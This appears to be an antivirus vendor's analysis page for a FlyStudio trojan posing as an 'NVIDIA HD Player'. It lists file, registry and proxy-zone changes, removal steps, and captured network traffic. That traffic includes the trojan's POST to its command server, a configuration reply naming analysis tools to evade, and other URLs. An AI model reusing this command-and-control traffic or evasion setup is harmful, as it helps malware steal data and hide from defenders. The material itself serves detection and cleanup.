Trojan.Win32.FlyStudio_0fe7961b5f – Adaware

Dynamic Analysis

Payload

Behaviour	Description
EmailWorm	Worm can send e-mails.

Process activity

The Trojan creates the following process(es):

attrib.exe:1392

The Trojan injects its code into the following process(es):

%original file name%.exe:1460

Mutexes

The following mutexes were created/opened:

AMResourceMutex2ZonesLockedCacheCounterMutexZonesCounterMutexZonesCacheCounterMutexWininetProxyRegistryMutexWininetConnectionMutexWininetStartupMutexc:!documents and settings!adm!local settings!history!history.ie5!c:!documents and settings!adm!cookies!c:!documents and settings!adm!local settings!temporary internet files!content.ie5!_!MSFTHISTORY!_RasPbFileShimCacheMutex

File activity

The process %original file name%.exe:1460 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@www.so[1].txt (791 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (725 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
C:\exdui.dll (42 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.sogou[1].txt (162 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sysboom.duapp[1].txt (200 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (675 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[2].txt (391 bytes)
%WinDir%\system\exdui.dll (42 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (10892 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.so[2].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\now_set[1].htm (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (311 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@www.so[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.so[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (0 bytes)

Registry activity

The process %original file name%.exe:1460 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows Script\Settings]
"JITDebug" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B5 37 3C 47 42 D6 06 26 0C 91 3B FB 78 18 28 AA"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process attrib.exe:1392 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 D1 E9 9D CF 6F 8E 01 CE E5 F8 1B 4E C4 77 3D"

Dropped PE files

MD5	File path
7283299a80a0bcdd07ddb32efa4d0c2c	c:\WINDOWS\system\exdui.dll
7283299a80a0bcdd07ddb32efa4d0c2c	c:\exdui.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):
attrib.exe:1392
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Cookies\Current_User@www.so[1].txt (791 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (725 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
C:\exdui.dll (42 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.sogou[1].txt (162 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sysboom.duapp[1].txt (200 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (675 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[2].txt (391 bytes)
%WinDir%\system\exdui.dll (42 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (10892 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.so[2].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\now_set[1].htm (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (311 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

Company Name: NVIDIA Corporation
Product Name: HD Player
Product Version: 2.3.1.3
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.3.1.3
File Description:
Comments:
Language: English (United States)

Company Name: NVIDIA CorporationProduct Name: HD Player Product Version: 2.3.1.3Legal Copyright: Legal Trademarks: Original Filename: Internal Name: File Version: 2.3.1.3File Description: Comments: Language: English (United States)

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	2175466	2179072	4.33883	dc37bc87fd606900a922b91c28c4c8c3
.rdata	2183168	469776	471040	4.88407	80d022cc38b23077c1210cee2e0c223b
.data	2654208	364017	90112	3.52306	0a032db0534453f043a5353cf0d63907
.rsrc	3018752	383700	385024	1.55761	0c8967591a131031440442acbdae9df8

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL	IP
hxxp://sysn.applinzi.com/tool/get_date.php
hxxp://duapp.n.shifen.com/music/url.txt
hxxp://sysn.applinzi.com/now_set.php
hxxp://sysn.applinzi.com/calc_online/calc.php
hxxp://www.a.shifen.com/s?wd=AAA266314320305272344325250273372
hxxp://www.a.shifen.com/s?wd=AAA266314320305272344325250
hxxp://so.qh-lb.com/s?q=aaaçŸä¿¡è½°ç‚¸æœº
hxxp://so.qh-lb.com/s?q=aaaçŸä¿¡è½°ç‚¸
hxxp://www.a.shifen.com/s?wd=www.aaazha.com
hxxp://www.baidu.com/s?wd=AAA..........
hxxp://www.baidu.com/s?wd=AAA........
hxxp://www.so.com/s?q=aaaçŸä¿¡è½°ç‚¸	106.120.160.134
hxxp://www.db-ha.com/now_set.php	220.181.136.41
hxxp://www.haosou.com/s?q=aaaçŸä¿¡è½°ç‚¸	125.88.193.243
hxxp://www.db-ha.com/calc_online/calc.php	220.181.136.41
hxxp://www.haosou.com/s?q=aaaçŸä¿¡è½°ç‚¸æœº	125.88.193.243
hxxp://www.baidu.com/s?wd=www.aaazha.com
hxxp://www.db-ha.com/tool/get_date.php	220.181.136.41
hxxp://www.so.com/s?q=aaaçŸä¿¡è½°ç‚¸æœº	106.120.160.134
hxxp://sysboom.duapp.com/music/url.txt	220.181.7.172
www.sogou.com	203.90.249.162

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /s?q=aaaçŸä¿¡è½°ç‚¸æœº HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: VVV.so.com

Cache-Control: no-cache

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: openresty

Date: Wed, 05 Oct 2016 23:17:06 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Vary: Accept-Encoding

Set-Cookie: QiHooGUID=F9145230C09493E46C8AB693BAD1011E.1475709426775; expires=Fri, 05-Oct-2018 23:17:06 GMT; path=/

Set-Cookie: _S=lrev8rg26lsl3nqlf0cmfclrl3; expires=Wed, 05-Oct-2016 23:27:06 GMT; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Set-Cookie: tso_Anoyid=11147570942619424242; expires=Fri, 05-Oct-2018 23:17:06 GMT; path=/

6028..<!DOCTYPE html>.....<html>.<head>.<meta charset="utf-8">.<meta content="always" name="referrer">.<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">.<title>aaa..............._360......</title>.<link rel="dns-prefetch" href="//s0.qhimg.com">.<link rel="dns-prefetch" href="//s1.qhimg.com">.<link rel="dns-prefetch" href="//p0.qhimg.com">.<link rel="dns-prefetch" href="//p1.qhimg.com">.<link rel="shortcut icon" href="hXXp://s0.qhimg.com/static/52166db8c450f68d.ico" type="image/x-icon">.<link rel="search" type="application/opensearchdescription xml" href="https://VVV.so.com/soopensearch.xml" title="360......">.<style type="text/css">body{background:#fff;color:#333;min-width:1000px;position:relative}body,th,td{font-family:arial}html,body,ul,ol,li,dl,dd,h1,h2,h3,h4,h5,h6,pre,form,input,button,textarea,p,th,td{margin:0;padding:0}p,form,ol,ul,li,h3,menu{list-style:none}table,img{border:0}img,object,select,input,textarea,button{vertical-align:middle}th{text-align:left}h1,h2,h3,h4,h5,h6,input,textarea,select,cite,em,i,b,strong,th{font-size:100%;font-style:normal}ins,s,u,del{text-decoration:none}em,cit

<<< skipped >>>

GET /s?wd=AAA.......... HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: VVV.baidu.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Wed, 05 Oct 2016 23:16:57 GMT

Content-Type: text/html;charset=utf-8

Transfer-Encoding: chunked

Connection: Keep-Alive

Vary: Accept-Encoding

Set-Cookie: BAIDUID=D5AFD4BF0DE069D4127B6171812A2F42:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com

Set-Cookie: BIDUPSID=D5AFD4BF0DE069D4127B6171812A2F42; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com

Set-Cookie: PSTM=1475709416; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com

Set-Cookie: BD_CK_SAM=1;path=/

Set-Cookie: BDSVRTM=94; path=/

Set-Cookie: H_PS_PSSID=1446_18282_17943_21120_21191_21161; path=/; domain=.baidu.com

P3P: CP=" OTI DSP COR IVA OUR IND COM "

Cache-Control: private

Cxy_all: baidu 0c86f471760cdece4b2b4178c12f7153

Cxy_ex: 1475709417 3663786690 d41d8cd98f00b204e9800998ecf8427e

X-Powered-By: HPHP

Server: BWS/1.1

X-UA-Compatible: IE=Edge,chrome=1

BDPAGETYPE: 3

BDQID: 0x83a1b5c9000222bc

BDUSERID: 0

531e..<!DOCTYPE html><html><head><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta content="always" name="referrer"><meta name="theme-color" content="#2932e1"><link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" /><link rel="icon" sizes="any" mask href="//VVV.baidu.com/img/baidu.svg"><link rel="search" type="application/opensearchdescription xml" href="/content-search.xml" title="............" /><title>AAA..............._............</title><style data-for="result" id="css_newi_result">body{color:#333;background:#fff;padding:6px 0 0;margin:0;position:relative;min-width:900px}body,th,td,.p1,.p2{font-family:arial}p,form,ol,ul,li,dl,dt,dd,h3{margin:0;padding:0;list-style:none}input{padding-top:0;padding-bottom:0;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box}table,img{border:0}td{font-size:9pt;line-height:18px}em{font-style:normal;color:#c00}a em{text-decoration:underline}cite{font-style:normal;color:#008000}.m,a.m{color:#666}a.m:visited{color:#606}.g,a.g{color:#008000}.c{color:#77c}.f14{font-size:14px}.f10{font-size:10.5pt}.f16{font-size:16px}.f13{font-size:13px}.bg{background-image:url(hXXp://s1.bdstatic.com/r/www/cache/static/global/img/icons_0e814c16.png);background-repeat:no-repeat;_background-image:url(hXXp://s1.bdstatic.com/r/www/cache/static/global/img/icons_5c448026.gif);backgrou

<<< skipped >>>

GET /s?wd=AAA........ HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: VVV.baidu.com

Cache-Control: no-cache

Cookie: BAIDUID=D5AFD4BF0DE069D4127B6171812A2F42:FG=1; BIDUPSID=D5AFD4BF0DE069D4127B6171812A2F42; PSTM=1475709416; H_PS_PSSID=1446_18282_17943_21120_21191_21161; BD_CK_SAM=1; BDSVRTM=94

HTTP/1.1 200 OK

Date: Wed, 05 Oct 2016 23:16:58 GMT

Content-Type: text/html;charset=utf-8

Transfer-Encoding: chunked

Connection: Keep-Alive

Vary: Accept-Encoding

Cache-Control: private

Cxy_all: baidu a8c3b2015de22305f035b39cde82d80e

Cxy_ex: 1475709418 3663786690 1d1fc270c63b26659ac8d100bcebdc02

X-Powered-By: HPHP

Server: BWS/1.1

X-UA-Compatible: IE=Edge,chrome=1

BDPAGETYPE: 3

BDQID: 0xf93f43f50002128d

BDUSERID: 0

Set-Cookie: BD_CK_SAM=1;path=/

Set-Cookie: BDSVRTM=96; path=/

Set-Cookie: H_PS_PSSID=1446_18282_17943_21120_21191_21161; path=/; domain=.baidu.com

45e..<!DOCTYPE html><html><head><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta content="always" name="referrer"><meta name="theme-color" content="#2932e1"><link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" /><link rel="icon" sizes="any" mask href="//VVV.baidu.com/img/baidu.svg"><link rel="search" type="application/opensearchdescription xml" href="/content-search.xml" title="............" /><title>AAA............_............</title><style data-for="result" id="css_newi_result">body{color:#333;background:#fff;padding:6px 0 0;margin:0;position:relative;min-width:900px}body,th,td,.p1,.p2{font-family:arial}p,form,ol,ul,li,dl,dt,dd,h3{margin:0;padding:0;list-style:none}input{padding-top:0;padding-bottom:0;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box}table,img{border:0}td{font-size:9pt;line-height:18px}em{font-style:normal;color:#c00}a em{text-decoration:underline}cite{font-style:normal;color:#008000}.m,a.m{color:#666}a.m:visited{color:#606}.g,a.g{color:#008000}..b40...c{color:#77c}.f14{font-size:14px}.f10{font-size:10.5pt}.f16{font-size:16px}.f13{font-size:13px}.bg{background-image:url(hXXp://s1.bdstatic.com/r/www/cache/static/global/img/icons_0e814c16.png);background-repeat:no-repeat;_background-image:url(hXXp://s1.bdstatic.com/r/www/cache/static/global/img/icons_5c448026.gif);backg

<<< skipped >>>

GET /s?wd=VVV.aaazha.com HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: VVV.baidu.com

Cache-Control: no-cache

Cookie: BAIDUID=D5AFD4BF0DE069D4127B6171812A2F42:FG=1; BIDUPSID=D5AFD4BF0DE069D4127B6171812A2F42; PSTM=1475709416; H_PS_PSSID=1446_18282_17943_21120_21191_21161; BD_CK_SAM=1; BDSVRTM=96

HTTP/1.1 200 OK

Date: Wed, 05 Oct 2016 23:17:12 GMT

Content-Type: text/html;charset=utf-8

Transfer-Encoding: chunked

Connection: Keep-Alive

Vary: Accept-Encoding

Cache-Control: private

Cxy_all: baidu 79552b80398715448ddb86ba214bd7fd

Cxy_ex: 1475709432 3663786690 1d1fc270c63b26659ac8d100bcebdc02

X-Powered-By: HPHP

Server: BWS/1.1

X-UA-Compatible: IE=Edge,chrome=1

BDPAGETYPE: 3

BDQID: 0xa26cea7f000258a4

BDUSERID: 0

Set-Cookie: BD_CK_SAM=1;path=/

Set-Cookie: BDSVRTM=139; path=/

Set-Cookie: H_PS_PSSID=1446_18282_17943_21120_21191_21161; path=/; domain=.baidu.com

45e..<!DOCTYPE html><html><head><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta content="always" name="referrer"><meta name="theme-color" content="#2932e1"><link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" /><link rel="icon" sizes="any" mask href="//VVV.baidu.com/img/baidu.svg"><link rel="search" type="application/opensearchdescription xml" href="/content-search.xml" title="............" /><title>VVV.aaazha.com_............</title><style data-for="result" id="css_newi_result">body{color:#333;background:#fff;padding:6px 0 0;margin:0;position:relative;min-width:900px}body,th,td,.p1,.p2{font-family:arial}p,form,ol,ul,li,dl,dt,dd,h3{margin:0;padding:0;list-style:none}input{padding-top:0;padding-bottom:0;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box}table,img{border:0}td{font-size:9pt;line-height:18px}em{font-style:normal;color:#c00}a em{text-decoration:underline}cite{font-style:normal;color:#008000}.m,a.m{color:#666}a.m:visited{color:#606}.g,a.g{color:#008000}...1680..c{color:#77c}.f14{font-size:14px}.f10{font-size:10.5pt}.f16{font-size:16px}.f13{font-size:13px}.bg{background-image:url(hXXp://s1.bdstatic.com/r/www/cache/static/global/img/icons_0e814c16.png);background-repeat:no-repeat;_background-image:url(hXXp://s1.bdstatic.com/r/www/cache/static/global/img/icons_5c448026.gif);backg

<<< skipped >>>

GET /tool/get_date.php HTTP/1.1

Accept: */*

Referer: hXXp://VVV.db-ha.com/tool/get_date.php

Accept-Language: zh-CN,zh;q=0.8,ja;q=0.6

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.10 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Host: VVV.db-ha.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: sae

Date: Wed, 05 Oct 2016 23:16:54 GMT

Content-Type: text/html

Content-Length: 19

Connection: keep-alive

Via: 10.13.144.188

2016-10-06 07:16:54HTTP/1.1 200 OK..Server: sae..Date: Wed, 05 Oct 2016 23:16:54 GMT..Content-Type: text/html..Content-Length: 19..Connection: keep-alive..Via: 10.13.144.188..2016-10-06 07:16:54....

GET /calc_online/calc.php HTTP/1.1

Accept: */*

Referer: hXXp://VVV.db-ha.com/calc_online/calc.php

Accept-Language: zh-CN,zh;q=0.8,ja;q=0.6

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.10 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Host: VVV.db-ha.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: sae

Date: Wed, 05 Oct 2016 23:16:56 GMT

Content-Type: text/html

Content-Length: 13

Connection: keep-alive

Via: 10.13.144.239

Set-Cookie: VGOTCN_OnLineCount=U36

[now]_81[now]HTTP/1.1 200 OK..Server: sae..Date: Wed, 05 Oct 2016 23:16:56 GMT..Content-Type: text/html..Content-Length: 13..Connection: keep-alive..Via: 10.13.144.239..Set-Cookie: VGOTCN_OnLineCount=U36..[now]_81[now]..

GET /s?q=aaaçŸä¿¡è½°ç‚¸ HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: VVV.so.com

Cache-Control: no-cache

Connection: Keep-Alive

Cookie: QiHooGUID=F9145230C09493E46C8AB693BAD1011E.1475709426775; _S=lrev8rg26lsl3nqlf0cmfclrl3; tso_Anoyid=11147570942619424242

HTTP/1.1 200 OK

Server: openresty

Date: Wed, 05 Oct 2016 23:17:10 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Vary: Accept-Encoding

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

6000..<!DOCTYPE html>.....<html>.<head>.<meta charset="utf-8">.<meta content="always" name="referrer">.<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">.<title>aaa............_360......</title>.<link rel="dns-prefetch" href="//s0.qhimg.com">.<link rel="dns-prefetch" href="//s1.qhimg.com">.<link rel="dns-prefetch" href="//p0.qhimg.com">.<link rel="dns-prefetch" href="//p1.qhimg.com">.<link rel="shortcut icon" href="hXXp://s0.qhimg.com/static/52166db8c450f68d.ico" type="image/x-icon">.<link rel="search" type="application/opensearchdescription xml" href="https://VVV.so.com/soopensearch.xml" title="360......">.<style type="text/css">body{background:#fff;color:#333;min-width:1000px;position:relative}body,th,td{font-family:arial}html,body,ul,ol,li,dl,dd,h1,h2,h3,h4,h5,h6,pre,form,input,button,textarea,p,th,td{margin:0;padding:0}p,form,ol,ul,li,h3,menu{list-style:none}table,img{border:0}img,object,select,input,textarea,button{vertical-align:middle}th{text-align:left}h1,h2,h3,h4,h5,h6,input,textarea,select,cite,em,i,b,strong,th{font-size:100%;font-style:normal}ins,s,u,del{text-decoration:none}em,cite{f

<<< skipped >>>

POST /now_set.php HTTP/1.1

Accept: */*

Referer: hXXp://VVV.db-ha.com/now_set.php

Accept-Language: zh-CN,zh;q=0.8,ja;q=0.6

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.10 Safari/537.36

Host: VVV.db-ha.com

Content-Length: 213

Cache-Control: no-cache

sos=1&key_1=94915c80f8a084lPl5M5y38K&key_2=10144f1e091b08bjK119WLVp4&ver=2.313&open=ooo2313&act=&md_sta=e656849a8c8c56f7f668f92d0182e6cb&time=2016-10-06 07:16:54&onlineF=1d8cf39371716fb36c6ecd85f2241433&dynasty=n6

HTTP/1.1 200 OK

Server: sae

Date: Wed, 05 Oct 2016 23:16:55 GMT

Content-Type: text/html;charset=utf-8

Content-Length: 3881

Connection: keep-alive

Via: 10.13.144.188

[s1]SOFTWARE\Now_warks\[s1][s2]%WinDir%\system\WINSPLEDX[s2][s3]SOFTWARE\Now_warkO\[s3][s4]C:\Windows\show2.jpg[s4][s5]hXXp://VVV.db-ha.com/calc_online/calc.php[s5][s6]600000[s6][b1]%WinDir%\system\JspXmlFora.txt[b1][s14]SmartSniff|Fiddler|...............|Wireshark|Charles|WinSock Expert[s14][s15]999999999[s15][s17]C:\Windows\System\background_image.jpg[s17][s19]hXXp://n.aaazha.com/page/study/teaManager.html[s19][F1]24,1A,D7,4B,63,5D,95,8F,37,17,96,A6,77,33,BA,C2,[F1][F2]d2VibWFzdGVyQEhLNzE4MDk=[F2][F3]dsll=207[F3][F4]/WEB/D_Jk/[F4][F5]/WEB/D_ym_Jk/[F5][F6]1[F6][F7]1[F7][F8]5[F8][s20]C:\Windows\System\get_local_datum.txt[s20][dlyc]40000[dlyc][fzbyc]30000[fzbyc][jcmc]AAA...............[jcmc][sypost]3[sypost][xmlHttp_GetInfo]1[xmlHttp_GetInfo][xmlHttp_AddCode]1[xmlHttp_AddCode][GetFried]73[GetFried][upHelp]69[upHelp][back_url]hXXp://VVV.db-ha.com/back_list/content.txt[back_url][skype_url]hXXp://n.aaazha.com/page/study/skype.html[skype_url][admin_url]hXXp://VVV.baidu.com[admin_url][s21]54,32,02,ED,D5,B5,3C,E8,30,84,76,C2,5E,F4,02,16,35,87,15,E6,B7,D6,CE,[s21][s22]hXXp://cgi.im.qq.com/cgi-bin/cgi_svrtime[s22][min]1120[min][max]1500[max][p=obs]A3,A9,[obs][p=obp]25,7A,57,[obp][strcd]15[strcd][strbs]gnb*[strbs][getCoot]15[getCoot][senKet]8*66[senKet][sz166]1500[sz166][sz52k]10000[sz52k][mmd88]76.com[mmd88][objokj]baidu.com[objokj][de3]720000[de3][addBase]14[addBase][http-s]image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, ap

<<< skipped >>>

GET /music/url.txt HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: sysboom.duapp.com

Cache-Control: no-cache

HTTP/1.1 404 Not Found

Server: openresty

Date: Wed, 05 Oct 2016 23:16:54 GMT

Content-Type: text/html

Content-Length: 345

Connection: keep-alive

Set-Cookie: BAEID=61048F546A35CDB463F5F04B98D1F275; expires=Thu, 05-Oct-17 23:16:54 GMT; max-age=31536000; path=/; version=1

<?xml version="1.0" encoding="iso-8859-1"?>.<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="en" lang="en">. <head>. <title>404 - Not Found</title>. </head>. <body>. <h1>404 - Not Found</h1>. </body>.</html>.HTTP/1.1 404 Not Found..Server: openresty..Date: Wed, 05 Oct 2016 23:16:54 GMT..Content-Type: text/html..Content-Length: 345..Connection: keep-alive..Set-Cookie: BAEID=61048F546A35CDB463F5F04B98D1F275; expires=Thu, 05-Oct-17 23:16:54 GMT; max-age=31536000; path=/; version=1..<?xml version="1.0" encoding="iso-8859-1"?>.<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="en" lang="en">. <head>. <title>404 - Not Found</title>. </head>. <body>. <h1>404 - Not Found</h1>. </body>.</html>...

GET /s?q=aaaçŸä¿¡è½°ç‚¸ HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: VVV.haosou.com

Cache-Control: no-cache

HTTP/1.1 301 Moved Permanently

Server: openresty

Date: Wed, 05 Oct 2016 23:17:09 GMT

Content-Type: text/html

Content-Length: 178

Connection: keep-alive

Location: hXXp://VVV.so.com/s?q=aaaçŸä¿¡è½°ç‚¸

<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>....

GET /s?q=aaaçŸä¿¡è½°ç‚¸æœº HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: VVV.haosou.com

Cache-Control: no-cache

